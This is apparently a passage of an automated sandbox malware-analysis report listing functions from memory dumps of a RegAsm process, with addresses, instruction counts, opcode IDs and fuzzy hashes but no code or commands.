                                • Source File: 00000003.00000002.3557928320.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_c0d000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cc708803144d428ca377de417a818212973cf546a3d12896d24fd906598568a4
                                • Instruction ID: 2e4a528139204ba7717a95ac00635167f9ac4fa135a482df5efcf354a62d2ed5
                                • Opcode Fuzzy Hash: cc708803144d428ca377de417a818212973cf546a3d12896d24fd906598568a4
                                • Instruction Fuzzy Hash: 97213471604300DFCB10DF54DAC0B26BBA1EB84318F24C56DD80E4B296C73AD847CA62
                                Function 06173BB0 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 992e2d3ff5095ad70b261792d2b48f8d9331730a2ba606dd75b42c4d2f1aceff
                                • Instruction ID: 9cf963ee0beae6d904a6f07250dcd751ce7fe7c8805fa38c2db78241e111bc0d
                                • Opcode Fuzzy Hash: 992e2d3ff5095ad70b261792d2b48f8d9331730a2ba606dd75b42c4d2f1aceff
                                • Instruction Fuzzy Hash: E211A531B141259FDB589678C8546AF73BAEBC8715F00443AD40AEB340DF64DC029BA1
                                Function 06173DE7 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96e33e222538e05b31062da92d9e97da0179356a5254f58213385e118ded1b9
                                • Instruction ID: c106532fc5d2fadd5ddc4ce37a5b65537ad18e1c71fac55de571e51797ffdf0f
                                • Opcode Fuzzy Hash: a96e33e222538e05b31062da92d9e97da0179356a5254f58213385e118ded1b9
                                • Instruction Fuzzy Hash: 95112831B105141FDB65967EE81072BB7EBDBCAB10F14887AF10ACB341EEA5CC424391
                                Function 06173868 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b4380eff302ba800e30c72bf31395768ece7eb3a32a10017d2dce062e344d8a
                                • Instruction ID: eb08663099c61051d7549ee762b39611fedbcc494254bd7fb29d07a4fa833091
                                • Opcode Fuzzy Hash: 4b4380eff302ba800e30c72bf31395768ece7eb3a32a10017d2dce062e344d8a
                                • Instruction Fuzzy Hash: EA21D3B5D01259AFCB10DF9AD985ADEFFB4FB49324F10812AE918B7200C774A944CFA5
                                Function 0617ED78 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b639fd049962892877e5b37c4cef53a46b8b5b41e7713ad7304f6d68c01b602f
                                • Instruction ID: 237a2cc61513912de3c4994597e9ca5f033a093224042279a8d43fa85698dc18
                                • Opcode Fuzzy Hash: b639fd049962892877e5b37c4cef53a46b8b5b41e7713ad7304f6d68c01b602f
                                • Instruction Fuzzy Hash: 2401B130B101101FDB659A3D981072E6BE6DBCA610F1448BBE14AC7342EA95DC024395
                                Function 06173BA2 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12d222dc5bda9ac426dc4a3ca2551a3c652be8251839b94680ac9f02ddd05555
                                • Instruction ID: fdea906ccae5a250286cce50d96fd7f6579ca7e588adaacc5ddb9a868432d336
                                • Opcode Fuzzy Hash: 12d222dc5bda9ac426dc4a3ca2551a3c652be8251839b94680ac9f02ddd05555
                                • Instruction Fuzzy Hash: 61012432B080645FDB659A78CC246EB77FADBC8710F04493AD08AD7240EFA0980287E2
                                Function 06173870 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80de45ca18b54920d8c204d5e71f85a4bea4224d0382791e61c9f6e849d0a3a4
                                • Instruction ID: 2f88be9fb2b3360c82d2b170dfee9ae620ac76ad861b001a2a21f506aa9b3440
                                • Opcode Fuzzy Hash: 80de45ca18b54920d8c204d5e71f85a4bea4224d0382791e61c9f6e849d0a3a4
                                • Instruction Fuzzy Hash: 4C11B0B5D01259AFCB00DF9AD984ADEFFB4FB49324F10852AE918B7200C375A954CFA5
                                Function 0617A300 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05aea5c5528a8815e366a70487fbd6b1da5da23cd79f618b74be97776840085e
                                • Instruction ID: 59e9045e61a4339cbcc8affb18dd8cf370a740de784ccbb499961d530e000f13
                                • Opcode Fuzzy Hash: 05aea5c5528a8815e366a70487fbd6b1da5da23cd79f618b74be97776840085e
                                • Instruction Fuzzy Hash: 7C01A730B045105FCB51EA78E850B1E77E5EB86754F14487EE14ACB341EB61DC428392
                                Function 06173DF8 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83cb7be342c88a8d7dfcfdb49ac0c48d5cb1ef2125fdfccb6e895b41d78dcc3b
                                • Instruction ID: 828669c29b06b82be74149f99a2d197bac8ed684933fbacff9ad2862e30ba883
                                • Opcode Fuzzy Hash: 83cb7be342c88a8d7dfcfdb49ac0c48d5cb1ef2125fdfccb6e895b41d78dcc3b
                                • Instruction Fuzzy Hash: B701A431B104241BDB64957EE41072BB2EBDBC9B10F24883AE11EC7344EEA6DC024395
                                Function 0617C7C0 Relevance: .0, Instructions: 50COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52784a32d1d426289ec2c91ffc101086f3bfee9eb989ba488a94aa544452889a
                                • Instruction ID: 3c558f66b2631877cb5643be4232edd52aa05b1941fb734d2335dc606df9302b
                                • Opcode Fuzzy Hash: 52784a32d1d426289ec2c91ffc101086f3bfee9eb989ba488a94aa544452889a
                                • Instruction Fuzzy Hash: AA01F731F141249FDB549A75E8516EDBBB2EB89354F14487AE440EB385DB219841C7C0
                                Function 0617ED88 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 163ada1dd520c7edf4bf9ab017b67d66d125f7ce96f53d753bd6741b80229175
                                • Instruction ID: cf66980f8abb044fa83a78b3c082e4e1d57a65dcfd93fe69246b1446727077ab
                                • Opcode Fuzzy Hash: 163ada1dd520c7edf4bf9ab017b67d66d125f7ce96f53d753bd6741b80229175
                                • Instruction Fuzzy Hash: 0A013C35B104241BDB65D57DE455B2E67EBDBCAA20F14887AE20ACB340EFA5DC424389
                                Function 0617A310 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c27884d419be46af977d478ed7be07de72b89d6e08a2d79d07d779d2281e41fd
                                • Instruction ID: 206c670c9eab0c92805c24d5036ebc07584c1ea3b03cd11f8330f7ed69ed754a
                                • Opcode Fuzzy Hash: c27884d419be46af977d478ed7be07de72b89d6e08a2d79d07d779d2281e41fd
                                • Instruction Fuzzy Hash: 63014430B105145FDB54EA79E850B2E73E6EB89B54F50887AE10ACB344EA65DC424785
                                Function 0617C7D0 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: feab40120c1512d618a8c35e9f7a5efe97f695c5ac634a0e3289ef559c5809d1
                                • Instruction ID: d9c14bbff7a6cdb18dd0f3715a8aacd3205ee85c4f07965ffbd3e21df3c7b93e
                                • Opcode Fuzzy Hash: feab40120c1512d618a8c35e9f7a5efe97f695c5ac634a0e3289ef559c5809d1
                                • Instruction Fuzzy Hash: EC01C831F206289FDF589A79E841A9EB7B5F785354F00447EE901EB344DB31A94487C0
                                Function 06176479 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03e6cc9edc6e6cc7ae18c132ae5e05b14c4d28cab321c562b5d26bed00fa0d5f
                                • Instruction ID: 5cc39850bc948e27b64f4c539598e8b93188ba3604ae2ce519cee45ca4b24e1e
                                • Opcode Fuzzy Hash: 03e6cc9edc6e6cc7ae18c132ae5e05b14c4d28cab321c562b5d26bed00fa0d5f
                                • Instruction Fuzzy Hash: A7F09271E696846FDF61CF7089613AE7BF99F42214F2888E6C089C7152E232CA029381

                                Non-executed Functions

                                Function 061776A0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2222239885
                                • Opcode ID: 2bb23327b6862d3cdc7d3c564f70d51e0f92f1a03b762e966adc42c63f5c8051
                                • Instruction ID: 548ba9c61f3f8580055158a271e3572bf614e1d0e778141d1767cd36080e7c03
                                • Opcode Fuzzy Hash: 2bb23327b6862d3cdc7d3c564f70d51e0f92f1a03b762e966adc42c63f5c8051
                                • Instruction Fuzzy Hash: 57121C30E002198FDB68DF75C954A9DB7F2BF89704F2089A9D409AB3A5DB319D85CF81
                                Function 0617A938 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-3823777903
                                • Opcode ID: c6de9998bf119e453a849027eecfacb7b70fd8afb0c71dbf19ccd418206127cc
                                • Instruction ID: dab9afcd052c221627e3387e46494b65e87d38b0032a5e4155c170cee0662b43
                                • Opcode Fuzzy Hash: c6de9998bf119e453a849027eecfacb7b70fd8afb0c71dbf19ccd418206127cc
                                • Instruction Fuzzy Hash: F8918130E00209DFEB68DF64DA55B6E7BF2BF84305F108829E401AB3A5DB75AD45CB90
                                Function 061770A0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-390881366
                                • Opcode ID: 87a88e7645b4959eb8686cc60385553fbbd3f5ab834758046d8e7a983422673d
                                • Instruction ID: 09761d6b9be99b5ab4e7a09936706fc48b49de92dd1cd53b3c99444e69f4470c
                                • Opcode Fuzzy Hash: 87a88e7645b4959eb8686cc60385553fbbd3f5ab834758046d8e7a983422673d
                                • Instruction Fuzzy Hash: 2EF16230B04208CFDB59EF64D554A6EB7F2BF84304F248569E4059B3A9DB31ED46CB50
                                Function 061783D8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: d5acc85b6ac92510ac5a94c175b0d0c2edcb48fbc1f2fb4f3719a17b4f263c78
                                • Instruction ID: d509b764f987c54499505a7888c76ca756896dae182996565e99952027814390
                                • Opcode Fuzzy Hash: d5acc85b6ac92510ac5a94c175b0d0c2edcb48fbc1f2fb4f3719a17b4f263c78
                                • Instruction Fuzzy Hash: 49B13D30B102088FDB94DF69D58876EB7F6AF88304F248879E406AB355DB75DD86CB90
                                Function 0617ACC0 Relevance: 5.2, Strings: 4, Instructions: 173COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: 3dce6d2c981324087f08469de21e1fb9a42c44b794ebfd2a13d78ad6002ef99e
                                • Instruction ID: 491a5b8e770b7d495c0977f3b76505028fb1ea6b304b468e6f43cdfef77abf19
                                • Opcode Fuzzy Hash: 3dce6d2c981324087f08469de21e1fb9a42c44b794ebfd2a13d78ad6002ef99e
                                • Instruction Fuzzy Hash: B751D430E102089FDF65DB64D884AAEB7F2EF89300F24896AE801DB355DB31EC45CB90
                                Function 061787F0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR^q$LR^q$$^q$$^q
                                • API String ID: 0-2454687669
                                • Opcode ID: be3b6ce012f0f44f0120a4a9e27ebe6349418b047214e0b3ac3bde8670e64caa
                                • Instruction ID: b8d71ce54361ede0b9921480cb7efcc0ef8a1fec3094a2e8f1e15d283c435c49
                                • Opcode Fuzzy Hash: be3b6ce012f0f44f0120a4a9e27ebe6349418b047214e0b3ac3bde8670e64caa
                                • Instruction Fuzzy Hash: DC51B130B006058FDB98EB68D944A6AB7F2FF88714F1489B9E4059F3A5DB31EC45CB91